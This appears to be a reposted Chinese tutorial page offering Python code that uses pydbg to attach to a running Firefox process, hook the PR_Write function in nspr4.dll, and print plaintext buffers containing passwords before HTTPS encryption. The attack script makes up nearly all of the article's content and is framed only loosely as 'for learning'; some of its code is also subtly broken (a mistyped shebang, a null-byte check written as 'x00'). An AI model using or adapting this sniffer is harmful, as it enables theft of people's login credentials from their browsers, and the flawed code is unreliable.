Community
Learn
Tools Library
AI Tools
Leisure
search
English
Home Backend Development Python Tutorial python利用hook技术破解https的实例代码

python利用hook技术破解https的实例代码

Jun 06, 2016 am 11:27 AM
hook https

相对于http协议,http是的特点就是他的安全性,http协议的通信内容用普通的嗅探器可以捕捉到,但是https协议的内容嗅探到的是加密后的内容,对我们的利用价值不是很高,所以一些大的网站----涉及到“大米”的网站,采用的都是http是协议,嘿嘿,即便这样,还是有办法能看到他的用户名和密码的,嘿嘿,本文只是用于技术学习,只是和大家交流技术,希望不要用于做违法的事情,这个例子是在firefox浏览器下登录https协议的网站,我们预先打开程序,就来了个捕获用户名和密码:

下面是源代码:

代码如下:


#!/ur/bin/env python    
from pydbg import *
from pydbg.defines import *

import utils    
import sys    

dbg = pydbg()    
found_firefox = False

pattern = "password"

         
def ssl_sniff( dbg, args ):    
    buffer = ""    
    offset = 0

    while 1:    
        byte = dbg.read_process_memory( args[1] + offset, 1 )    
        if byte != "x00":    
            buffer += byte    
            offset += 1
            continue
        else:    
            break
    if pattern in buffer:    
        print "Pre-Encrypted: %s" % buffer
    return DBG_CONTINUE    
# 寻找firefox.exe的进程    
for (pid, name) in dbg.enumerate_processes():    
    if name.lower() == "firefox.exe":    
        found_firefox = True
        hooks = utils.hook_container()    
        dbg.attach(pid)    
        print "[*] Attaching to firefox.exe with PID: %d" % pid    
# 得到firefox的hook的 address    
        hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write")    
        if hook_address:    
# 添加hook的内容,包括他的pid,地址,嗅探类型   

            hooks.add( dbg, hook_address, 2, ssl_sniff, None )    
            print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address    
            break
        else:    
            print "[*] Error: Couldn't resolve hook address."
            sys.exit(-1)    
        if found_firefox:    
            print "[*] Hooks set, continuing process."
            dbg.run()    
        else:    
                print "[*] Error: Couldn't find the firefox.exe process."
                sys.exit(-1)    

if found_firefox:    
    print "[*] Hooks set, continuing process."
    dbg.run()    
else:    
    print "[*] Error: Couldn't find the firefox.exe process."
    sys.exit(-1)

转自:http://world77.blog.bitsCN.com/414605/518679

Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot Article

Repo: How To Revive Teammates
3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
How Long Does It Take To Beat Split Fiction?
3 weeks ago By DDD
R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
1 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island Adventure: How To Get Giant Seeds
3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Difficulty in updating caching of official account web pages: How to avoid the old cache affecting the user experience after version update?
3 weeks ago By 王林
Show More

Hot tools Tags

Code&IT
Voice
Business
Marketing
AI Detector
Chatbot
Design&Art

Hot Article

Repo: How To Revive Teammates
3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
How Long Does It Take To Beat Split Fiction?
3 weeks ago By DDD
R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
1 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island Adventure: How To Get Giant Seeds
3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Difficulty in updating caching of official account web pages: How to avoid the old cache affecting the user experience after version update?
3 weeks ago By 王林
Show More

Hot Article Tags

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Show More

Hot Topics

Where is the login entrance for gmail email?
7285
9
Java Tutorial
1622
14
CakePHP Tutorial
1342
46
Laravel Tutorial
1259
25
PHP Tutorial
1206
29
Show More
Related knowledge
How to use Nginx Proxy Manager to implement automatic jump from HTTP to HTTPS How to use Nginx Proxy Manager to implement automatic jump from HTTP to HTTPS Sep 26, 2023 am 11:19 AM

How to use Nginx Proxy Manager to implement automatic jump from HTTP to HTTPS

How to use Nginx Proxy Manager to implement reverse proxy under HTTPS protocol How to use Nginx Proxy Manager to implement reverse proxy under HTTPS protocol Sep 26, 2023 am 08:40 AM

How to use Nginx Proxy Manager to implement reverse proxy under HTTPS protocol

Nginx with SSL: Configure HTTPS to protect your web server Nginx with SSL: Configure HTTPS to protect your web server Jun 09, 2023 pm 09:24 PM

Nginx with SSL: Configure HTTPS to protect your web server

What does the https workflow look like? What does the https workflow look like? Apr 07, 2024 am 09:27 AM

What does the https workflow look like?

How vue3 hook reconstructs DataV's full-screen container component How vue3 hook reconstructs DataV's full-screen container component May 16, 2023 pm 02:43 PM

How vue3 hook reconstructs DataV's full-screen container component

How Nginx firewall ensures HTTPS secure communication How Nginx firewall ensures HTTPS secure communication Jun 10, 2023 am 10:16 AM

How Nginx firewall ensures HTTPS secure communication

How to configure https in tomcat How to configure https in tomcat Jan 05, 2024 pm 05:15 PM

How to configure https in tomcat

How to upgrade https under Nginx How to upgrade https under Nginx May 14, 2023 pm 04:49 PM

How to upgrade https under Nginx

See all articles